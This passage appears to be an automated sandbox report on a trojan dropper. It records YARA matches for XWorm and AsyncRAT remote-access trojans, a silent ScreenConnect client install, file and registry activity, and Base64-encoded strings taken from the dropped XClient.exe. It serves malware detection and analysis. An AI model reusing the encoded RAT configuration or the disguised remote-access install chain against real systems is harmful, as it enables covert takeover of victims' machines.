                        Source: svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474745682.000002B560502000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                        Source: svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
                        Source: svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474745682.000002B560502000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                        Source: svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
                        Source: svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474745682.000002B560502000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                        Source: svchost.exe, 00000011.00000002.2474745682.000002B560502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/Res
                        Source: svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                        Source: svchost.exe, 00000011.00000003.1301654508.000002B560D10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                        Source: svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
                        Source: svchost.exe, 00000011.00000003.1301654508.000002B560D10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                        Source: svchost.exe, 00000011.00000003.1301654508.000002B560D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
                        Source: svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1303457308.000002B560D3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302283763.000002B560D40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474745682.000002B560502000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302834084.000002B560D2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1301895243.000002B560D55000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302146142.000002B560D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                        Source: svchost.exe, 0000000A.00000003.1385756682.0000025C08A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                        Source: svchost.exe, 0000000A.00000002.1386291943.0000025C08A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                        Source: svchost.exe, 0000000A.00000002.1386291943.0000025C08A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                        Source: svchost.exe, 0000000A.00000002.1386238553.0000025C08A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                        Source: svchost.exe, 0000000A.00000003.1385706569.0000025C08A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                        Source: svchost.exe, 0000000A.00000002.1386317275.0000025C08A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1385706569.0000025C08A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
                        Source: svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://watson.telemetry.microso

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior

                        System Summary

                        barindex
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 2.0.XClient.exe.a60000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 2.0.XClient.exe.a60000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000002.00000000.1232990166.0000000000A62000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4e450c.msiJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{5DB4AB1A-07F1-053A-3398-B9E647E40642}Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI473E.tmpJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI475F.tmpJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI49E0.tmpJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4e450e.msiJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4e450e.msiJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{5DB4AB1A-07F1-053A-3398-B9E647E40642}Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{5DB4AB1A-07F1-053A-3398-B9E647E40642}\DefaultIconJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{5DB4AB1A-07F1-053A-3398-B9E647E40642}.SchedServiceConfig.rmiJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (37ec872757ed9eb0)Jump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (37ec872757ed9eb0)\p2gbz4n4.tmpJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (37ec872757ed9eb0)\p2gbz4n4.newcfgJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                        Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI475F.tmpJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI49E0.tmpJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\4e450e.msiJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI473E.tmpJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\4e450c.msiJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeFile deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (37ec872757ed9eb0)\p2gbz4n4.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 2_2_00007FF88B2066362_2_00007FF88B206636
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 2_2_00007FF88B2025012_2_00007FF88B202501
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 2_2_00007FF88B2017792_2_00007FF88B201779
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 2_2_00007FF88B2073E22_2_00007FF88B2073E2
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 2_2_00007FF88B2022612_2_00007FF88B202261
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 2_2_00007FF88B2010FA2_2_00007FF88B2010FA
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeCode function: 9_2_0118D5889_2_0118D588
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 16_2_00007FF88B21D26F16_2_00007FF88B21D26F
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 16_2_00007FF88B2170FA16_2_00007FF88B2170FA
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 16_2_00007FF88B21EE3016_2_00007FF88B21EE30
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 16_2_00007FF88B2110CF16_2_00007FF88B2110CF
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 16_2_00007FF88B2110D716_2_00007FF88B2110D7
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 16_2_00007FF88B21EE0D16_2_00007FF88B21EE0D
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 16_2_00007FF88B21EE6816_2_00007FF88B21EE68
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 16_2_00007FF88B526EFD16_2_00007FF88B526EFD
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 16_2_00007FF88B525E6116_2_00007FF88B525E61
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 19_2_00007FF88B22708A19_2_00007FF88B22708A
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 19_2_00007FF88B22BB7719_2_00007FF88B22BB77
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 19_2_00007FF88B22BB8519_2_00007FF88B22BB85
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 19_2_00007FF88B22A0AD19_2_00007FF88B22A0AD
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 19_2_00007FF88B2210CF19_2_00007FF88B2210CF
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 19_2_00007FF88B2210D719_2_00007FF88B2210D7
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 19_2_00007FF88B22061019_2_00007FF88B220610
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 19_2_00007FF88B536F7519_2_00007FF88B536F75
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 19_2_00007FF88B54271919_2_00007FF88B542719
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 19_2_00007FF88B53F2D219_2_00007FF88B53F2D2
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeCode function: 19_2_00007FF88B53298019_2_00007FF88B532980
                        Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Client.dll EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
                        Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.dll FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 468 -p 6468 -ip 6468
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 00000000.00000000.1227099826.0000000001568000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOutput.exe4 vs SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exel% vs SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 00000000.00000002.1247617817.000000001C470000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exe.muiX vs SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 00000000.00000002.1247617817.000000001C470000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeBinary or memory string: OriginalFilenameOutput.exe4 vs SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 2.0.XClient.exe.a60000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 2.0.XClient.exe.a60000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000002.00000000.1232990166.0000000000A62000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe, 5Q3MO7HER4QVrhh3m4LI7MNWRpF0DKBUqy.csCryptographic APIs: 'TransformFinalBlock'
                        Source: XClient.exe.0.dr, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.csCryptographic APIs: 'TransformFinalBlock'
                        Source: XClient.exe.0.dr, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.csCryptographic APIs: 'TransformFinalBlock'
                        Source: XClient.exe.0.dr, Ow6BsVeEzBRWzxUbuYY7ONsKmPONHuhWv4gl6rT1aeXX2ULcGN6.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, Ow6BsVeEzBRWzxUbuYY7ONsKmPONHuhWv4gl6rT1aeXX2ULcGN6.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, Ow6BsVeEzBRWzxUbuYY7ONsKmPONHuhWv4gl6rT1aeXX2ULcGN6.csCryptographic APIs: 'TransformFinalBlock'
                        Source: ScreenConnect.Windows.dll.4.dr, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                        Source: ScreenConnect.WindowsBackstageShell.exe.4.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                        Source: ScreenConnect.WindowsBackstageShell.exe.4.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                        Source: ScreenConnect.WindowsBackstageShell.exe.4.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                        Source: XClient.exe.0.dr, aOY1LHkSxcz7bCNxQCW.csBase64 encoded string: 'uhHq/nkKN9PUkSLpEpV+q3pKOiMVBN5FKf95wBY7Ueo7xVtMWTdFLW0iDK2bGL2n', 'G3pye3hJBqK2+lwjsVf1Z1mBDlapcFqjm1PfemfTAVLAjNtnRdA4sijrNwDmO1L0', 'r1UHrTUrhxCQn0ooHIc+WTjEuIp+1j1vVM1efiWABxq0svTy4gtBssm5M0NTfMKq', 'khwFzxp58ZXDYXCI/j8ZjHcfZpne25POzCvPXC5/LZpjr3U7JbYZ4hsxMaE24rjL', 'ReHO87l8eQUqrzNDkj3w+RnglCqIr//Sdc6G1Ft++f7eBTuILpeQ4wyDk5Y0/p7N'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, aOY1LHkSxcz7bCNxQCW.csBase64 encoded string: 'uhHq/nkKN9PUkSLpEpV+q3pKOiMVBN5FKf95wBY7Ueo7xVtMWTdFLW0iDK2bGL2n', 'G3pye3hJBqK2+lwjsVf1Z1mBDlapcFqjm1PfemfTAVLAjNtnRdA4sijrNwDmO1L0', 'r1UHrTUrhxCQn0ooHIc+WTjEuIp+1j1vVM1efiWABxq0svTy4gtBssm5M0NTfMKq', 'khwFzxp58ZXDYXCI/j8ZjHcfZpne25POzCvPXC5/LZpjr3U7JbYZ4hsxMaE24rjL', 'ReHO87l8eQUqrzNDkj3w+RnglCqIr//Sdc6G1Ft++f7eBTuILpeQ4wyDk5Y0/p7N'
